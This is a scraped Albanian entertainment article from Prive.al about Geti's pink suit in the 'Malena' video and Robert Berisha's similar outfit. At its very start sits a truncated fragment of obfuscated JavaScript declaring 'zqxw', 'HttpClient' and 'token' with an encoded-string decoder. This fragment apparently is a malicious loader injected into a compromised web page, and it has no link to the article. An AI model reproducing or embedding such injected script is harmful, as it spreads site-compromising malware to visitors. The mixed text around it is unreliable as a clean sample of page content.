;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

U habitët me veshjen e Getit në klipin e ri? Nuk ishte i pari këtë sezon!

By

Ditën e djeshme u publikua videoklipi i këngës ‘Malena’.

Siç e kanë bërë traditë, Geti dhe Majk sollën këngën e verës e cila mëton të jetë një tjetër hit në vargun e projekteve si ‘S’jena mo’, ‘Ajo’ e ‘Paris Milano’.

Edhe pamjen dyshja e kishin me ritme verore mirëpo ishte Geti ai që befasoi.

I njohur për eksperimentet e tij me modën, lideri i ‘Babastars’ këtë herë nuk kishte zgjedhur të zezën e as ngjyrën ari për t’i shkuar përshtati imazhit që synon ta ndërtojë si ‘MMV’. Geti, zgjodhi një kostum rozë duke habitur të gjithë.

Mirëpo, ai duket të mos jetë i vetmi që zgjodhi këtë veshje në prag të sezonit veror.

Me një kostum rozë, pak javë më parë ishte shfaqur edhe këngëtari Robert Berisha teksa pozonte për veshjet e koleksionit më të ri të kreatorit Mr. Rex.

Duket se meshkujt shqiptarë këtë herë kanë vendosur të dalin jashtë kondiktave duke zgjedhur rozën në veshje e duke lyer flokët. Se deri ku do të mbërrijë ‘çmenduria’ këtë verë, është ende herët ta themi! /Prive.al

Artikuj të ngjashëm